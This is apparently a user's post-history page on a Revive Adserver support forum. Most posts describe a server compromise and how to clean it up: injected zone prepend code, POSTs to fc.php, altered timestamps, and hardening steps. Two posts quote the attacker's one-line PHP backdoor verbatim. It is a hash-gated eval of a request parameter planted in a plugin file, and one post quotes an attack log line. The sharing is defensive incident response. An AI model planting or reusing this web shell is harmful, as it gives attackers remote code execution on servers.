Jump to content

tvvpmi

Approved members
  • Content Count

    12
  • Joined

  • Last visited

Everything posted by tvvpmi

  1. tvvpmi

    revive Asynchronous JS hacked

    Yes. Timestamps has been changed as well. You can use linux commd "stat" to see the modification and change time stamps. Attacker is changing "modification time" to parent folder "modification time" so as not to raise suspicion This code is inserted via a POST call to fc.php. To avoid to be reinfected you can change write permisions on "plugins/bannerTypeText/oxText/genericText.delivery.php". Perhaps some revive developer can tell us, what is the function of fc.php (front controller) to decide if we can disable it or not.
  2. tvvpmi

    Mobile ads have been hijacked

    Hi @vinmhas, I was in the same situation. You should review your file: plugins/bannerTypeText/oxText/genericText.delivery.php Problably it has been modified, adding a line like this at the end: if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);} You have to remove it. Also you have to search in the "images folder", for some php script ... and remove it. Perhaps you can send it privately to @Ian vM Clean the prepend code of your zones ... via sql o through the revive backend. Search for iframes and javascript codes. Disable PHP execution on image folder or move image folder to "another place" as they are static files and serve them throught another subdomain. You don't need PHP for them
  3. tvvpmi

    Mobile ads have been hijacked

    Message sent directly to @Ian vM
  4. tvvpmi

    Mobile ads have been hijacked

    I have more info. I just have received another attack just now. I have the POST parameters the attacker is using. Some of admin is interested in receiving them?
  5. tvvpmi

    Mobile ads have been hijacked

    Like in @snaggy case, this line has been added at the end of genericText.delivery.php if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);}
  6. tvvpmi

    Mobile ads have been hijacked

    Same here. From stat genericText.delivery.php 2018-12-22 08:51:50.724940460 +0100
  7. tvvpmi

    Mobile ads have been hijacked

    Last one 4.1.4 I have upgrade from prior version. But this instalation comes from an old instalation. 2.8 series I have modify the fc.php script to log post parameters. I'm waiting now for a new POST to check what we are receiving and to try reproduce the attack
  8. tvvpmi

    Mobile ads have been hijacked

    CONFIRMED the point of code injection un the prepend zones are the same @sunech has previously report [06/Jan/2019:12:22:53 +0100] "POST /www/delivery/fc.php?zoneid=0&script=bannerTypeText:oxText:genericText&Charset=UTF8&target=blank HTTP/1.1" 200 23 "https://google.com/serach?q=https://<adserver>/www/delivery&aqs=chrome.1.69i57j0j7&sourceid=chrome&ie=UTF-8" "AdsBot-Google (+http://www.google.com/adsbot.html)"
  9. tvvpmi

    Mobile ads have been hijacked

    The same problem here. I have access.log switched off, so I can't confirm how the injection os comming from. I have cleared all prepend code from zones table at DB, switch on logging and waiting for another injection wave.
  10. Yes. I know that. I have been using OpenX Source for a los time and before that phpadsnew, and now Revive Adserver. With new OpenX I want to mean that company. I don't know what software they are using in their services. Reading the link https://github.com/ampproject/amphtml/blob/master/ads/openx.md you can see that there is a parameter to set the host where the adserver is running. That makes me think that OpenX was the open source OpenX. Of course i have try it with my private versiĆ³n of OpenX and don't work. Inserting javascripts inside the AMP works. I have to try what happens when the page is cached at google amp cache
  11. Hi. It is not working because in AMP you can not include javascript code https://www.ampproject.org/docs/reference/amp-ad.html There is support from OpenX right now (https://github.com/ampproject/amphtml/blob/master/ads/openx.md) but I think it is the "new" openX. Not the revive ancestor
×